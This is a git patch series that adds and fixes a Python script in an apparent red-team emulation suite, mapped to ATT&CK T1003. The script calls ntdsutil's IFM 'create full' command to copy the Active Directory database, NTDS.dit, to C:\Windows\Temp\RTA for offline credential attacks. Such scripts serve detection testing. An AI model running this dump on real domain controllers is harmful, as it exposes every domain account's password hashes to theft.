From 4daa7c3112819cb5e1511fb7e3f606582c803404 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Thu, 10 Jan 2019 16:10:56 -0600 Subject: [PATCH 1/4] T1003 - Added ntdsutil test to dump AD database --- red_ttp/ntdsutil_dump_ad.py | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 red_ttp/ntdsutil_dump_ad.py diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py new file mode 100644 index 0000000..b774ddb --- /dev/null +++ b/red_ttp/ntdsutil_dump_ad.py @@ -0,0 +1,26 @@ +# Name: Dump Active Directory Database with NTDSUTIL +# rta: ntdsutil_dump_ad.py +# ATT&CK: T1003 +# Description: Dumps the Active Directory database, ntds.dit, to disk for offline credential access attacks. + +import os +import common + +NTDSUTIL = "ntdsutil.exe" +ACTIVATE = "\"activate instance ntds\"" +IFM = "\"IFM\"" +CREATE = "\“create full" +DUMPDIR = "C:\Windows\Temp\RTA" + + +def main(): + common.log("Executing ntdsutil.exe...") + success = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, DUMPDIR + "\"", "q", "q"]) + if success: + common.log("Successfully executed ntdsutil.exe! NTDS.dit at " + DUMPDIR + "\Active Directory\NTDS.dit.") + else: + common.log("Did not successfully execute ntdsutil.exe.") + + +if __name__ == "__main__": + exit(main()) \ No newline at end of file From 440cfc96cf803fa1d7cff86ca24f6d0af35b551b Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Thu, 10 Jan 2019 16:30:11 -0600 Subject: [PATCH 2/4] Added functionality to create dump folder --- red_ttp/ntdsutil_dump_ad.py | 27 ++++++++++++++++++++++++--- 1 file changed, 24 insertions(+), 3 deletions(-) diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py index b774ddb..f4efd78 100644 --- a/red_ttp/ntdsutil_dump_ad.py +++ b/red_ttp/ntdsutil_dump_ad.py @@ -5,21 +5,42 @@ import os import common +import errno NTDSUTIL = "ntdsutil.exe" ACTIVATE = "\"activate instance ntds\"" IFM = "\"IFM\"" CREATE = "\“create full" -DUMPDIR = "C:\Windows\Temp\RTA" +DUMPDIR = "C:\Windows\Temp\RTA" +NTDSDIT_FILE = DUMPDIR + "\Active Directory\NTDS.dit" def main(): + + common.log("Ensuring dump folder exists...") + if os.path.exists(DUMPDIR): + common.log("Dump folder already exists, moving on!") + else + common.log("Dump folder doesn't exist, creating...") + try: + os.makedirs(directory) + except OSError as e: + if e.errno != errno.EEXIST: + common.log("Failed to create dump folder!") + raise + + common.log("Executing ntdsutil.exe...") - success = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, DUMPDIR + "\"", "q", "q"]) - if success: + code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, DUMPDIR + "\"", "q", "q"]) + + if code == 0: common.log("Successfully executed ntdsutil.exe! NTDS.dit at " + DUMPDIR + "\Active Directory\NTDS.dit.") else: common.log("Did not successfully execute ntdsutil.exe.") + if os.path.exists(NTDSDIT_FILE): + common.log("Successfully dumped Active Directory to " + NTDSDIT_FILE) + else: + common.log("Did not successfully create NTDS.dit file.") if __name__ == "__main__": From c102f30d0a50575dede7fc47116e828be697144c Mon Sep 17 00:00:00 2001 From: ForensicITGuy Date: Thu, 10 Jan 2019 17:04:48 -0600 Subject: [PATCH 3/4] Fixing things after testing --- red_ttp/ntdsutil_dump_ad.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py index f4efd78..2906acc 100644 --- a/red_ttp/ntdsutil_dump_ad.py +++ b/red_ttp/ntdsutil_dump_ad.py @@ -8,10 +8,10 @@ import errno NTDSUTIL = "ntdsutil.exe" -ACTIVATE = "\"activate instance ntds\"" -IFM = "\"IFM\"" -CREATE = "\“create full" +ACTIVATE = "activate instance ntds" +IFM = "IFM" DUMPDIR = "C:\Windows\Temp\RTA" +CREATE = "create full " + DUMPDIR NTDSDIT_FILE = DUMPDIR + "\Active Directory\NTDS.dit" @@ -20,10 +20,10 @@ def main(): common.log("Ensuring dump folder exists...") if os.path.exists(DUMPDIR): common.log("Dump folder already exists, moving on!") - else + else: common.log("Dump folder doesn't exist, creating...") try: - os.makedirs(directory) + os.makedirs(DUMPDIR) except OSError as e: if e.errno != errno.EEXIST: common.log("Failed to create dump folder!") @@ -31,7 +31,7 @@ def main(): common.log("Executing ntdsutil.exe...") - code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, DUMPDIR + "\"", "q", "q"]) + code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, "q", "q"]) if code == 0: common.log("Successfully executed ntdsutil.exe! NTDS.dit at " + DUMPDIR + "\Active Directory\NTDS.dit.") From 7c7f2861df49854cb8888965ff8830cc6c6facb8 Mon Sep 17 00:00:00 2001 From: ForensicITGuy Date: Thu, 10 Jan 2019 17:07:50 -0600 Subject: [PATCH 4/4] Forgot to remove redundant message. --- red_ttp/ntdsutil_dump_ad.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py index 2906acc..9a3099b 100644 --- a/red_ttp/ntdsutil_dump_ad.py +++ b/red_ttp/ntdsutil_dump_ad.py @@ -34,7 +34,7 @@ def main(): code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, "q", "q"]) if code == 0: - common.log("Successfully executed ntdsutil.exe! NTDS.dit at " + DUMPDIR + "\Active Directory\NTDS.dit.") + common.log("Successfully executed ntdsutil.exe!") else: common.log("Did not successfully execute ntdsutil.exe.") if os.path.exists(NTDSDIT_FILE):